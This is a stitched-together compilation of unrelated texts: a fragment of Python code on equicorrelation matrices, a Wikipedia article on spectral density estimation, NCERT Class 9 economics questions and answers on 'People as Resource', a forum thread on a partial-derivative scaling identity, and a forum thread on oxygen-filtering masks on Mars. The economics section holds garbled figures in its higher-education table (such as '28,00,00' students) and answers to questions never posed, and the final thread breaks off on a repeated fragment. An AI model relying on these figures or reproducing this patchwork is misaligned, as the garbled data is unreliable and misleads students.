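    return (1 - rho) * np.eye(N) + rho * np.ones((N, N))

N = 5
for rho in [0.0, 0.2, 0.5, 0.8]:
    R = equicorr(N, rho)
    # Closed form: det = (1 + (N-1) rho) * (1 - rho)^(N-1)
    closed = (1 + (N - 1) * rho) * (1 - rho) ** (N - 1)
    print(rho, np.linalg.det(R), closed)   # determinant shrinks as rho grows
```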
|
# Spectral density estimation
For the statistical concept, see probability density estimation.
For a broader coverage related to this topic, see Spectral density.
In statistical signal processing, the goal of spectral density estimation (SDE) is to estimate the spectral density (also known as the power spectral density) of a random signal from a sequence of time samples of the signal. Intuitively speaking, the spectral density characterizes the frequency content of the signal. One purpose of estimating the spectral density is to detect any periodicities in the data, by observing peaks at the frequencies corresponding to these periodicities.
Some SDE techniques assume that a signal is composed of a limited (usually small) number of generating frequencies plus noise and seek to find the location and intensity of the generated frequencies. Others make no assumption on the number of components and seek to estimate the whole generating spectrum.
## Overview
Example of voice waveform and its frequency spectrum
A periodic waveform (triangle wave) and its frequency spectrum, showing a "fundamental" frequency at 220 Hz followed by multiples (harmonics) of 220 Hz.
The power spectral density of a segment of music is estimated by two different methods, for comparison.
Spectrum analysis, also referred to as frequency domain analysis or spectral density estimation, is the technical process of decomposing a complex signal into simpler parts. As described above, many physical processes are best described as a sum of many individual frequency components. Any process that quantifies the various amounts (e.g. amplitudes, powers, intensities, or phases), versus frequency can be called spectrum analysis.
Spectrum analysis can be performed on the entire signal. Alternatively, a signal can be broken into short segments (sometimes called frames), and spectrum analysis may be applied to these individual segments. Periodic functions (such as sinusoids) are particularly well-suited for this sub-division. General mathematical techniques for analyzing non-periodic functions fall into the category of Fourier analysis.
The Fourier transform of a function produces a frequency spectrum which contains all of the information about the original signal, but in a different form. This means that the original function can be completely reconstructed (synthesized) by an inverse Fourier transform. For perfect reconstruction, the spectrum analyzer must preserve both the amplitude and phase of each frequency component. These two pieces of information can be represented as a 2-dimensional vector, as a complex number, or as magnitude (amplitude) and phase in polar coordinates (i.e., as a phasor). A common technique in signal processing is to consider the squared amplitude, or power; in this case the resulting plot is referred to as a power spectrum.
Because of reversibility, the Fourier transform is called a representation of the function, in terms of frequency instead of time; thus, it is a frequency domain representation. Linear operations that could be performed in the time domain have counterparts that can often be performed more easily in the frequency domain. Frequency analysis also simplifies the understanding and interpretation of the effects of various time-domain operations, both linear and non-linear. For instance, only non-linear or time-variant operations can create new frequencies in the frequency spectrum.
In practice, nearly all software and electronic devices that generate frequency spectra utilize a discrete Fourier transform (DFT), which operates on samples of the signal, and which provides a mathematical approximation to the full integral solution. The DFT is almost invariably implemented by an efficient algorithm called fast Fourier transform (FFT). The squared-magnitude components of a DFT are a type of power spectrum called periodogram, which is widely used for examining the frequency characteristics of noise-free functions such as filter impulse responses and window functions. But the periodogram does not provide processing-gain when applied to noiselike signals or even sinusoids at low signal-to-noise ratios. In other words, the variance of its spectral estimate at a given frequency does not decrease as the number of samples used in the computation increases. This can be mitigated by averaging over time (Welch's method[1]) or over frequency (smoothing). Welch's method is widely used for SDE. However, periodogram-based techniques introduce small biases that are unacceptable in some applications. So other alternatives are presented in the next section.
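A minimal sketch of Welch's method with SciPy (the test signal and the parameters are chosen here only for illustration):

```python
import numpy as np
from scipy import signal

fs = 1000.0                                          # sampling rate in Hz
t = np.arange(0, 10, 1/fs)
x = np.sin(2*np.pi*50*t) + np.random.randn(t.size)   # 50 Hz tone buried in noise

# Averaged periodogram (Welch's method): averaging over segments reduces
# the variance of the estimate at the cost of frequency resolution.
f, Pxx = signal.welch(x, fs=fs, nperseg=1024)
print(f[np.argmax(Pxx)])                             # ≈ 50 Hz
```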
## Techniques
Many other techniques for spectral estimation have been developed to mitigate the disadvantages of the basic periodogram. These techniques can generally be divided into non-parametric and parametric methods. The non-parametric approaches explicitly estimate the covariance or the spectrum of the process without assuming that the process has any particular structure. Some of the most common estimators in use for basic applications (e.g. Welch's method) are non-parametric estimators closely related to the periodogram. By contrast, the parametric approaches assume that the underlying stationary stochastic process has a certain structure that can be described using a small number of parameters (for example, using an auto-regressive or moving average model). In these approaches, the task is to estimate the parameters of the model that describes the stochastic process.
Following is a partial list of non-parametric spectral density estimation techniques:
Below is a partial list of parametric techniques:
### Parametric estimation
In parametric spectral estimation, one assumes that the signal is modeled by a stationary process which has a spectral density function (SDF) $S(f; a_1, \ldots, a_p)$ that is a function of the frequency $f$ and $p$ parameters $a_1, \ldots, a_p$.[2] The estimation problem then becomes one of estimating these parameters.
The most common form of parametric SDF estimate uses as a model an autoregressive model $\text{AR}(p)$ of order $p$.[2]:392 A signal sequence $\{Y_t\}$ obeying a zero mean $\text{AR}(p)$ process satisfies the equation

$$Y_t = \phi_1 Y_{t-1} + \phi_2 Y_{t-2} + \cdots + \phi_p Y_{t-p} + \epsilon_t,$$

where the $\phi_1, \ldots, \phi_p$ are fixed coefficients and $\epsilon_t$ is a white noise process with zero mean and innovation variance $\sigma_p^2$. The SDF for this process is

$$S(f; \phi_1, \ldots, \phi_p, \sigma_p^2) = \frac{\sigma_p^2\,\Delta t}{\left|1 - \sum_{k=1}^{p} \phi_k e^{-2\pi i f k\,\Delta t}\right|^2}, \qquad |f| < f_N,$$

with $\Delta t$ the sampling time interval and $f_N = 1/(2\Delta t)$ the Nyquist frequency.
There are a number of approaches to estimating the parameters of the process and thus the spectral density:[2]:452-453
• The Yule-Walker estimators are found by recursively solving the Yule-Walker equations for an $\text{AR}(p)$ process
• The Burg estimators are found by treating the Yule-Walker equations as a form of ordinary least squares problem. The Burg estimators are generally considered superior to the Yule-Walker estimators.[2]:452 Burg associated these with maximum entropy spectral estimation.[3]
• The forward-backward least-squares estimators treat the $\text{AR}(p)$ process as a regression problem and solve that problem using the forward-backward method. They are competitive with the Burg estimators.
• The maximum likelihood estimators assume the white noise is a Gaussian process and estimates the parameters using a maximum likelihood approach. This involves a nonlinear optimization and is more complex than the first three.
Alternative parametric methods include fitting to a moving average model (MA) and to a full autoregressive moving average model (ARMA).
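A minimal sketch of the Yule-Walker estimator in NumPy/SciPy (the helper function and the test AR(2) process below are ours, for illustration):

```python
import numpy as np
from scipy.linalg import solve_toeplitz

def yule_walker(x, p):
    """Estimate AR(p) coefficients and innovation variance from data x."""
    x = np.asarray(x) - np.mean(x)
    N = len(x)
    # Biased sample autocovariances r[0..p]
    r = np.array([np.dot(x[:N-k], x[k:]) / N for k in range(p + 1)])
    phi = solve_toeplitz(r[:p], r[1:p+1])    # solve the Toeplitz Yule-Walker system
    sigma2 = r[0] - np.dot(phi, r[1:p+1])    # innovation variance
    return phi, sigma2

# Example: recover the coefficients of a known AR(2) process
rng = np.random.default_rng(0)
e = rng.standard_normal(100_000)
x = np.zeros_like(e)
for n in range(2, len(e)):
    x[n] = 0.75*x[n-1] - 0.5*x[n-2] + e[n]

print(yule_walker(x, 2))   # ≈ ([0.75, -0.5], 1.0)
```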
## Frequency estimation
Frequency estimation is the process of estimating the complex frequency components of a signal in the presence of noise given assumptions about the number of the components.[4] This contrasts with the general methods above, which do not make prior assumptions about the components.
### Finite number of tones
A typical model for a signal $x(n)$ consists of a sum of $p$ complex exponentials in the presence of white noise $w(n)$:

$$x(n) = \sum_{i=1}^{p} A_i e^{j n\omega_i} + w(n)$$

The power spectral density of $x(n)$ is composed of $p$ impulse functions in addition to the spectral density function due to noise.
The most common methods for frequency estimation involve identifying the noise subspace to extract these components. These methods are based on eigen decomposition of the autocorrelation matrix into a signal subspace and a noise subspace. After these subspaces are identified, a frequency estimation function is used to find the component frequencies from the noise subspace. The most popular methods of noise subspace based frequency estimation are Pisarenko's method, the multiple signal classification (MUSIC) method, the eigenvector method, and the minimum norm method.
### Single tone
If one only wants to estimate the single loudest frequency, one can use a pitch detection algorithm. If the dominant frequency changes over time, then the problem becomes the estimation of the instantaneous frequency as defined in the time–frequency representation. Methods for instantaneous frequency estimation include those based on the Wigner-Ville distribution and higher order ambiguity functions.[5]
If one wants to know all the (possibly complex) frequency components of a received signal (including transmitted signal and noise), one uses a discrete Fourier transform or some other Fourier-related transform.
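The crudest single-tone estimator, the peak of the magnitude spectrum, is easy to sketch (signal parameters chosen only for illustration):

```python
import numpy as np

fs = 8000.0
t = np.arange(0, 1, 1/fs)
x = np.sin(2*np.pi*440.0*t) + 0.5*np.random.randn(t.size)   # noisy 440 Hz tone

# Estimate the dominant frequency as the peak of |FFT|
X = np.abs(np.fft.rfft(x))
freqs = np.fft.rfftfreq(t.size, d=1/fs)
print(freqs[np.argmax(X)])     # ≈ 440 Hz
```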
## Example calculation
Suppose $x_n$, from $n=0$ to $N-1$, is a time series (discrete time) with zero mean. Suppose that it is a sum of a finite number of periodic components (all frequencies are positive):

$$x_n = \sum_k A_k \sin(2\pi \nu_k n + \phi_k)$$

The variance of $x_n$ is, for a zero-mean function as above, given by

$$\frac{1}{N}\sum_{n=0}^{N-1} x_n^2.$$

If these data were samples taken from an electrical signal, this would be its average power (power is energy per unit time, so it is analogous to variance if energy is analogous to the amplitude squared).
Now, for simplicity, suppose the signal extends infinitely in time, so we pass to the limit as $N\to\infty$. If the average power is bounded, which is almost always the case in reality, then the following limit exists and is the variance of the data:

$$\lim_{N\to\infty}\frac{1}{N}\sum_{n=0}^{N-1} x_n^2.$$

Again, for simplicity, we will pass to continuous time, and assume that the signal extends infinitely in time in both directions. Then these two formulas become

$$x(t) = \sum_k A_k \sin(2\pi\nu_k t + \phi_k)$$

and

$$\lim_{T\to\infty}\frac{1}{2T}\int_{-T}^{T} x(t)^2\,dt.$$

The root mean square of $\sin$ is $1/\sqrt{2}$, so the variance of $A_k\sin(2\pi\nu_k t + \phi_k)$ is $A_k^2/2$. Hence, the contribution to the average power of $x(t)$ coming from the component with frequency $\nu_k$ is $A_k^2/2$. All these contributions add up to the average power of $x(t)$.
Then the power as a function of frequency is $A_k^2/2$, and its statistical cumulative distribution function $S(\nu)$ will be

$$S(\nu) = \sum_{k\,:\,\nu_k<\nu} \frac{A_k^2}{2}.$$

$S$ is a step function, monotonically non-decreasing. Its jumps occur at the frequencies of the periodic components of $x$, and the value of each jump is the power or variance of that component.
The variance is the covariance of the data with itself. If we now consider the same data but with a lag of $\tau$, we can take the covariance of $x(t)$ with $x(t+\tau)$, and define this to be the autocorrelation function $c$ of the signal (or data) $x$:

$$c(\tau) = \lim_{T\to\infty}\frac{1}{2T}\int_{-T}^{T} x(t)\,x(t+\tau)\,dt.$$

If it exists, it is an even function of $\tau$. If the average power is bounded, then $c$ exists everywhere, is finite, and is bounded by $c(0)$, which is the average power or variance of the data.
It can be shown that $c$ can be decomposed into periodic components with the same periods as $x$:

$$c(\tau) = \sum_k \frac{A_k^2}{2}\cos(2\pi\nu_k\tau).$$

This is in fact the spectral decomposition of $c$ over the different frequencies, and is related to the distribution of power of $x$ over the frequencies: the amplitude of a frequency component of $c$ is its contribution to the average power of the signal.
The power spectrum of this example is not continuous, and therefore does not have a derivative, and therefore this signal does not have a power spectral density function. In general, the power spectrum will usually be the sum of two parts: a line spectrum such as in this example, which is not continuous and does not have a density function, and a residue, which is absolutely continuous and does have a density function.
## References
1. Welch, P. D. (1967), "The use of Fast Fourier Transform for the estimation of power spectra: A method based on time averaging over short, modified periodograms", IEEE Transactions on Audio and Electroacoustics, AU-15 (2): 70–73, doi:10.1109/TAU.1967.1161901
2. Percival, Donald B.; Walden, Andrew T. (1992). Spectral Analysis for Physical Applications. Cambridge University Press. ISBN 9780521435413.
3. Burg, J.P. (1967) "Maximum Entropy Spectral Analysis", Proceedings of the 37th Meeting of the Society of Exploration Geophysicists, Oklahoma City, Oklahoma.
4. Hayes, Monson H., Statistical Digital Signal Processing and Modeling, John Wiley & Sons, Inc., 1996. ISBN 0-471-59431-8.
5. Lerga, Jonatan. "Overview of Signal Instantaneous Frequency Estimation Methods" (PDF). University of Rijeka. Retrieved 22 March 2014.
• Porat, B. (1994). Digital Processing of Random Signals: Theory & Methods. Prentice Hall. ISBN 0-13-063751-3.
• Priestley, M.B. (1991). Spectral Analysis and Time Series. Academic Press. ISBN 0-12-564922-3.
• Stoica, P.; Moses, R. (2005). Spectral Analysis of Signals. Prentice Hall. ISBN 0-13-113956-8.
• Thomson, D. J. (1982). "Spectrum estimation and harmonic analysis". Proceedings of the IEEE. 70 (9): 1055. doi:10.1109/PROC.1982.12433.
This article is issued from Wikipedia - version of the 11/30/2016. The text is available under the Creative Commons Attribution/Share Alike but additional terms may apply for the media files.
|
# NCERT Solutions for Class 9 Social Science Economics Chapter 2 People as Resource
These NCERT Solutions for Class 9 Social Science Economics Chapter 2 People as Resource Questions and Answers are prepared by our highly skilled subject experts to help students while preparing for their exams.
## People as Resource NCERT Solutions for Class 9 Social Science Economics Chapter 2
### Class 9 Economics Chapter 2 People as Resource InText Questions and Answers
Lets’s Discuss, NCERT Textbook Page 17
Question 1.
Looking at the photograph can you explain how a doctor, a teacher, engineer, and a tailor are an asset to the economy?
These people provide different services to the people of the country. A doctor treats the patients, a teacher gives education to the children and plays a valuable role in moulding them into good citizens, an engineer, a tailor, and many other people in different professions serve the society and the country in their own way. Therefore, they are an asset to the economy of the nation.
Lets’s Discuss, NCERT Textbook Page 18
Question 2.
Do you notice any difference between the two friends? What are those?
Story of Sakal
There were two friends Vilas and Sakal living in the same village Semapur. Sakal was a twelve-year-old boy. His mother Sheela looked after domestic chores. His father Buta Chaudhary worked in an agricultural field. Sakal helped his mother with domestic chores. He also looked after his younger brother Jeetu and sister Seetu. His uncle Shyam had passed the matriculation examination, but was sitting idle in the house as he had no job. Buta and Sheela were eager to educate Sakal. They enrolled him in the village school, which he soon joined.
He started studying and completed his higher secondary examination. His father persuaded him to continue his studies. He raised a loan for Sakal to study a vocational course in computers. Sakal was meritorious and interested in studies from the beginning. With great vigour and enthusiasm, he completed his course. After some time he got a job in a private firm. He even designed a new kind of software. This software helped him increase the sale of the firm. His boss acknowledged his services and rewarded him with a promotion.
Story of Vilas
Vilas was an eleven-year-old boy residing in the same village as Sakal. Vilas’s father Mahesh was a fisherman. His father passed away when he was only two years old. His mother Geeta sold fish to earn money to feed the family. She bought fish from the landowner’s pond and sold it in the nearby mandi. She could earn only Rs 150 a day by selling fish. Vilas suffered from arthritis. His mother could not afford to take him to the doctor. He could not go to school either, and he was not interested in studies. He helped his mother in cooking and also looked after his younger brother Mohan. After some time his mother fell sick and there was no one to look after her. There was no one in the family to support them. Vilas, too, was forced to sell fish in the same village. Like his mother, he earned only a meager income.
• Vilas had lost his father at an early age whereas Sakal was living with his parents.
• Sakal was interested in studies and went to school, but Vilas was too poor to go to school.
• Sakal completed a course in computers and got a nice job in a private firm, whereas Vilas remained illiterate and so never got any proper employment. He sold fish in the village market and earned a meager income.
• Since Sakal earned a good income, he was able to improve his family’s condition, but Vilas could not do so. He and his family were bound to live in extreme poverty.
Lets’s Discuss, NCERT Textbook Page 21
Question 3.
Study the graph given below and answer the following questions:
Source: Economic Survey, 2012.
1. Has the literacy rates of the population increased since 1951?
2. In which year India has the highest literacy rates?
3. Why literacy rate is high among the males of India?
4. Why are women less educated than men?
5. How would you calculate literacy in India?
1. Yes, the literacy rates of the population have increased since 1951. It was 18% in 1951. The figure rose to 74% in 2010-2011.
2. India has the highest literacy rate in 2011.
3. It is because, in our country, men’s education is considered more important than women’s.
4. India is a country where males dominate. They are given all privileges and are always seen at the forefront. Hence, their education is considered of utmost importance whereas women’s education is undermined. This is the reason why women are less educated than men.
5. The literacy rate is calculated as the number of literate people divided by the total population, multiplied by 100. This formula is expressed in the following way:
Literacy Rate = $$\frac{\text{Number of literate people in India}}{\text{Population of India}} \times 100$$
6. India’s literacy rate would be 80% by 2020.
Let's Discuss, NCERT Textbook Page 23
Question 4.
Discuss this table given below in the classroom and answer the following questions.
1. Is the increase in the number of colleges adequate to admit the increasing number of students?
2. Do you think we should have more Universities?
3. What is the increase noticed among the teachers in the year 1998-99?
Table 1: Number of Institutions of Higher Education, Enrolment and Faculty
| Year | Number of Colleges | Number of Universities | Students | Teachers |
|---|---|---|---|---|
| 1950-51 | 750 | 30 | 2,63,000 | 24,000 |
| 1990-91 | 7,346 | 177 | 49,25,000 | 2,72,000 |
| 1996-97 | 9,703 | 214 | 67,55,000 | 3,21,000 |
| 1998-99 | 11,089 | 238 | 74,17,000 | 3,42,000 |
| 2007-08 | 18,064 | 378 | 14,00,000 | 4,92,000 |
| 2011-12 | 31,324 | 611 | – | – |
| 2012-13 | 37,204 | 723 | 28,00,00 | – |
Source: UGC Annual Report 1996-97 and 1998-99 and Selected Educational Statistics, Ministry of HRD, Draft Report of Higher Educational for 11th Five Year Plan, the working group on Economic Survey 2011-12, 2012-13.
1. No, the increase in the number of colleges is not adequate to admit the increasing number of students because the number of students is increasing at a faster rate compared to the colleges being established in the country.
2. Yes, we should have more universities to keep pace with the increasing number of students.
3. There was an increase of 21 thousand teachers in the year 1998-99 compared to 1996-97.
4. Future Colleges and Universities should focus on increasing access, quality, adoption of state-specific curriculum modification, vocationalisation, and networking on the use of information technology.
Let's Discuss, NCERT Textbook Page 23
Question 5.
Study the table given below and answer the following questions:
Table 2: Health infrastructure over the years
1. What is the percentage increase in dispensaries from 1951 to 2011?
2. What is the percentage increase in doctors and nursing personnel from 1951 to 2011?
3. Do you think the increase in the number of doctors and nurses is adequate for India? If not, why?
4. What other facilities would you like to provide in a hospital?
5. Discuss the hospital you have visited.
6. Can you draw a graph using this table?
1. The percentage increase in dispensaries and hospitals from 1951 to 2011 is $$\frac{28472-9201}{9201} \times 100 \approx 209.44 \%$$
2. The percentage increase in doctors from 1951 to 2011 is $$\frac{816629-61800}{61800} \times 100 \approx 1221.40 \%$$
The percentage increase in nursing personnel from 1951 to 2011 is $$\frac{1702555-18054}{18054} \times 100 \approx 9330.34 \%$$
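All three calculations apply the same general percentage-increase formula:
$$\text{Percentage increase} = \frac{\text{Final value} - \text{Initial value}}{\text{Initial value}} \times 100$$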
3. For a country like India, where the population is so huge, the increase in the number of doctors and nurses is not adequate. We need many more of them.
4. Facilities that should be provided in a hospital are:
• Hospitals should be neat and clean.
• Doctors should be available 24 hours.
• Emergency wards should be made more efficient.
• Poor patients should be given treatment at a subsidized rate.
• At least one ATM should be there in every hospital.
• Chemist shops should also be available in hospitals.
5. Recently I visited Max Super Speciality Hospital located in Vaishali, Ghaziabad. It is India’s first truly integrated healthcare system, providing three levels of clinical service e.g. primary, secondary, and tertiary within one system. It has all the features of a world-class hospital. It has a team of highly qualified and trained doctors, nurses, and patient care personnel to provide the highest standard of care. This hospital is equipped with the latest medical equipment. Great care is taken on cleanliness. It has fully computerized health records. 24-hour chemist, ambulance, patient diagnostic, and emergency services are available here. The hospital is centrally air-conditioned.
### Class 9 Economics Chapter 2 People as Resource Textbook Questions and Answers
Question 1.
What do you understand by 'people as a resource'?
'People as a resource' is a way of referring to a country's working people in terms of their existing productive skills and abilities. If we look at the population from a productive aspect, it emphasizes its ability to contribute to the creation of the Gross National Product. Like other resources, population also is a resource, which is called a human resource. When the existing human resource is further developed by becoming more educated and healthy, we call it human capital formation, which adds to the productive power of the country.
Question 2.
How are human resources different from other resources like land and physical capital?
Human resource is different from other resources in the following ways:
• Human capital is in one way superior to other resources like land and physical capital. Human resources can make use of land and capital. Land and capital cannot become useful on their own.
• Human resources need investment through education, training, and medical care, etc. to develop. On the other hand, land and physical capital need money and physical inputs to develop.
• Land and physical capital are useless without human resources. Thus we can say that human resource is the most important resource because it helps to utilize natural resources.
Question 3.
What is the role of education in human capital formation?
Education plays a very significant role in human capital formation. It is an important input for the growth of an individual. It enables humans to realize their full potential and achieve success in life in the form of higher incomes through better jobs and higher productivity. Education helps individuals to make better use of the economic opportunities available before them.
Education and skill are the major determinants of the earning of any individual in the market. We have seen that a majority of women are paid low compared to men because they have meager education and skill formation. But women with high education and skill formation are paid at par with the men. So, education is important and it should be imparted to children with great care.
Question 4.
What is the role of health in human capital formation?
Not only education but health also plays a vital role in human capital formation. The health of a person helps him to realize his potential and the ability to fight illness. A healthy person can do the work in a more effective manner. He or she can contribute to the growth and development of the economy by doing productive work. On the contrary, an unhealthy person becomes a liability for the family and society. So health is an indispensable basis for realizing one’s well-being. Our government has been very serious on this point. The improvement in the health status of the population has been the priority of the country.
Question 5.
What part does health play in the individual’s working life?
An individual's working life is directly associated with his or her health. If he or she is healthy, he or she will work enthusiastically and efficiently. If not, doing work will be a burden for him or her, and no firm or organization will be inclined to employ him or her. So health should be given priority, because only a healthy person can become an asset to society and the nation.
Question 6.
What are the various activities undertaken in the primary, secondary, and tertiary sectors?
The various activities have been classified into three main sectors i.e., primary, secondary, and tertiary.
• The primary sector includes agriculture, forestry, animal husbandry, fishing, poultry farming, mining, and quarrying.
• Manufacturing is included in the secondary sector.
• Trade, transport, communication, banking, education, health, tourism, services, insurance, etc. are included in the tertiary sector.
Question 7.
What is the difference between economic activities and non-economic activities?
Economic activities: Activities that result in the production of goods and services and thereby add value to the national income are called economic activities. These activities involve remuneration, i.e., they are performed for money.
Non-economic activities: These activities are not performed for money and so do not add value to the national income. In fact, these activities are performed for self-consumption or to satisfy emotional needs.
Question 8.
Why are women employed in low-paid work?
• A majority of women have meager education and low skill formation. This is the main reason why they are paid low compared to men.
• Less education means less awareness as a result of which most of the women work in the unorganized sector and face job insecurity and earn a meager income.
• In our male-dominated society, women are considered physically inferior and therefore they are paid less than men for the same work.
Question 9.
How will you explain the term unemployment?
Unemployment is the state of being without any work, for both educated and uneducated persons, for earning one's livelihood. Unemployment is said to exist when people who are willing to work at the going wages cannot find jobs.
Question 10.
What is the difference between disguised unemployment and seasonal unemployment?
The difference between disguised unemployment and seasonal unemployment is given below:
| Seasonal Unemployment | Disguised Unemployment |
|---|---|
| I. Seasonal unemployment happens when people are not able to find a job during some months of the year. People dependent upon agriculture usually face this problem. | I. In the case of disguised unemployment, people appear to be employed. This usually happens among family members engaged in agricultural activities. |
| II. There are certain busy seasons when sowing, harvesting, weeding, and threshing are done. But when plants are growing, there is not much work. | II. Sometimes in agricultural families, eight people may be working on a farm whereas only five are needed to do the work. Thus, three persons are surplus and are not needed on the farm. They also do not help to increase the production of the farm. |
| III. During this period, they remain unemployed and are said to be seasonally unemployed. | III. If these extra persons are removed from the farm, the production will not be affected. These three persons appear to be employed but are actually disguisedly unemployed. |
Question 11.
Why is educated unemployment a peculiar problem of India?
• Educated unemployment has become a common problem in urban areas. Many youths with matriculation, graduation, and post-graduation degrees are not able to find jobs.
• A study showed that unemployment among graduates and post-graduates has increased faster than among matriculates. This is really a peculiar phenomenon.
• A paradoxical manpower situation is witnessed as a surplus of manpower in certain categories coexists with a shortage of manpower in others.
• There is unemployment among technically qualified people on one hand, while there is a dearth of technical skills for economic growth. Educated unemployment is, thus, a peculiar problem in India.
Question 12.
In which field do you think India can build the maximum employment opportunity?
India can build the maximum employment opportunity in the tertiary sector, also called the service sector. This sector in India employs many different kinds of people. There are a number of services such as biotechnology, information technology, etc. that employ highly skilled and educated workers. At the same time, there are a very large number of workers engaged in services such as small shopkeepers, repairpersons, transport persons, etc.
Question 13.
Can you suggest some measures in the education system to mitigate the problem of the educated unemployment?
In order to mitigate the problem of the educated unemployed, the following measures can be suggested:
• The focus should be given to increasing access, quality, adoption of state-specific curriculum modifications, vocationalisation, and networking on the use of information technology.
• There should be a focus on distant education, the convergence of formal, non-formal, distant, and IT education institutions.
• More opportunities should be made available in the service sector such as biotechnology, information technology, etc. so that educated unemployed can find jobs easily.
• The number of universities and institutions of higher learning in specialized areas should be increased in order to increase the enrolment of students. At the same time recruitment of teachers should also be increased.
Question 14.
Can you imagine some village that initially had no job opportunities but later came up with many?
1. Ratanpura was a very backward village a few decades ago. The only occupation of the villagers was agriculture which was dependent on rainfall. If rainfall was sufficient, there was no problem but if it was poor, the villagers would face problems because there were no other job opportunities.
2. Then electricity came there which changed the system of irrigation. People could now irrigate much larger areas more effectively with the help of electric-run tube wells. They could now grow more than one crop in a year and get work almost all the year.
3. By and by small-scale industries were set up which opened the door of employment. These industries provided both skilled and unskilled jobs to the village people.
4. With the passage of time people became aware of education and impressed upon the government the need for schools in the village. The government set up a primary and a secondary school where village people got an education, which ultimately enabled them to find jobs outside the village.
5. Then computer centers were set up which opened the door of vocational courses to the young enthusiastic villagers. These villagers after completing the course got jobs in private firms.
Question 15.
Which capital would you consider the best—land, labour, physical capital, and human capital? Why?
|
# Partial derivative.
## Homework Statement
Verify that if ##t=\lambda x##, then ##x^2\frac{\partial^2 y}{\partial x^2} = t^2\frac{\partial^2 y}{\partial t^2}##.
## The Attempt at a Solution
$$t=\lambda x\;\Rightarrow\; \frac{\partial t}{\partial x}=\lambda$$
$$\frac{\partial y}{\partial x} = \frac{\partial y}{\partial t}\frac{\partial t}{\partial x}= \lambda\;\frac{\partial y}{\partial t}$$
$$\frac{\partial^2 y}{\partial x^2}=\lambda \frac{\partial^2 y}{\partial t^2} \frac{\partial t}{\partial x}=\lambda^2\frac{\partial^2 y}{\partial t^2}$$
$$x^2\frac{\partial^2 y}{\partial x^2}=\frac{t^2}{\lambda^2}\lambda^2\frac{\partial^2 y}{\partial t^2}\;\Rightarrow\;x^2\frac{\partial^2 y}{\partial x^2} = t^2\frac{\partial^2 y}{\partial t^2}$$
Am I correct?
Thanks
arildno
Homework Helper
Gold Member
Dearly Missed
Yes, with just a minor quibble:
"t" is only dependent on "x", and not in addition dependent on other variables.
Thus, you should use dt/dx, rather than the symbol for the partial derivative here.
HallsofIvy
Homework Helper
Your differential equation has dependent variable "y" so it makes no sense to ask if "$t= \lambda x$" satisfies the equation.
I suspect you are asked to show that $f(t-\lambda x)$ satisfies the equation for f any twice differentiable function of a single variable.
arildno
Homework Helper
Gold Member
Dearly Missed
I don't agree HallsofIvy. Here, it is about how a simple linear scaling will affect the shape of a particular derivative from the "unscaled" x as independent variable, to its shape in its "scaled" variable "t". That is, we are dealing with the correct IDENTITY, not an equation!! It is not about an "equation" as such, but meant as an intermediate step in transforming an equation from the "x"-formulation to its logically equivalent "t"-formulation.
TECHNICALLY, we are looking at the relation between the shapes of the derivatives of functions y and Y, respectively, fulfilling the relation
y(x,....)=Y(t(x),...)
making an abuse of notation with replacing "Y" with "y" everywhere.
Last edited:
Thanks everyone. I meant exactly what I asked; it's only about the steps used to transform the differential equation.
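A quick concrete check, taking ##y = \sin t## as an illustrative choice, so that ##y = \sin(\lambda x)## as a function of ##x##:
$$\frac{\partial^2 y}{\partial x^2} = -\lambda^2 \sin(\lambda x), \qquad x^2\frac{\partial^2 y}{\partial x^2} = -x^2\lambda^2\sin(\lambda x) = -t^2\sin t = t^2\frac{\partial^2 y}{\partial t^2},$$
which confirms the identity for this example.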
|
Gas filter mask on Mars - sci fi
Gold Member
Summary:
In Kim Stanley Robinson's Mars Series, they had gas masks that preferentially let oxygen through. Can that work?
Main Question or Discussion Point
In the early parts of the books, Mars' ambient atmo pressure (and temperature) was increased, including not just CO2, but oxygen as well.
It rose to the point where they only needed masks that let through oxygen but not CO2.
In my amateur view, I would expect that this would not work very well. I see the partial pressure of oxygen entering the mask as being insufficient for breathing - they would be gasping for air and sucking deeply with every breath just to get oxygen.
Of course, it would be very dependent on the ambient atmo pressure and the concentration of oxygen...
Let's assume the masks are passive, not actively taking in oxygen and pressurizing it.
(While this is couched in a sci-fi story, the physics is real - and could conceivably work today for high altitudes - so i figure this is a more appropriate forum than Sci-Fi.)
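For scale, a rough Dalton's-law estimate (with made-up, purely illustrative numbers): the oxygen partial pressure at the mask is
$$p_{O_2} = x_{O_2} \, p_{total}$$
If the partially terraformed ambient pressure were 30 kPa with an oxygen mole fraction of 20%, then $p_{O_2} = 0.20 \times 30 \text{ kPa} = 6 \text{ kPa}$, well below the roughly 21 kPa of sea-level Earth air and slightly below the value near the summit of Everest, consistent with the gasping described above.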
BillTre
Gold Member
In theory, you could filter at a molecular level of fineness and only pass molecules of some particular size. If oxygen is the smallest size molecule, that could work. However, the membrane would be like a membrane in a reverse osmosis machine or membranes used in dialysis. The resistance to flow/surface area would be large. RO machines often use pumps to push water through their membranes.
An alternative could be sending the air through something like a resin that binds all the molecules you don't want. This would be a larger device, but with lower flow resistance. The filter material would get saturated, however, and would have to be replaced or treated to dump the bound molecules before it would be useful again.
Gold Member
That's all good to know.
To me, it seems as simple as: with only a partial pressure of oxygen at the face mask, and full ambient pressure on the body (i.e. lungs), a person would have to struggle to inhale - like trying to use a hollow reed to breathe at the bottom of a pond.
Correct. Unless there's some kind of inert gas circulated within the breather to equalize the pressure like in some types of diving or similar breathing devices, the breathing capacity will be limited by the tolerance of muscles involved.
Gold Member
Correct. Unless there's some kind of inert gas circulated within the breather to equalize the pressure like in some types of diving or similar breathing devices,
I am not sure I see how this would work.
the breathing capacity will be limited by the tolerance of muscles involved.
If you transpose this from abstract to practical, i.e. by imagining what it would be like to use such a device, I think anyone would categorize it as non-viable except as an emergency device. No device that makes you feel like you're sucking vacuum would be tolerable for more than a few minutes.
am not sure I see how this would work
Think of it as a special type of rebreather where the oxygen supply comes by filtering the 'air'.
jim mcnamara
Mentor
During cold periods on Mars the surface temperature would require a human to have 100% "coverage". So why try to create a mask in addition to whatever shield you have against the cold?
The premise of this thread is kind of weird, but the topic of partial pressure enhancement itself is first rate. I'm not sure where the thread should be.
Do not neglect thermodynamics - it will require substantial energy to increase the partial pressure of any one gas in the Martian atmosphere up to something compatible with Earth life. There is no free lunch on this one.
Low partial pressures of $O_2$ will suck oxygen out of the pulmonary system otherwise.
https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6420699/
jim mcnamara
Mentor
PS: Very low $P_{CO_2}$ levels affect the pulmonary system, too. Our pulmonary system evolved on Earth for ~300 million years, so there are lots of gotchas going to other planets.
Gold Member
What about positioning the filter at the intake of an air compressor?
See OP:
Let's assume the masks are passive, not actively taking in oxygen and pressurizing it.
See OP:
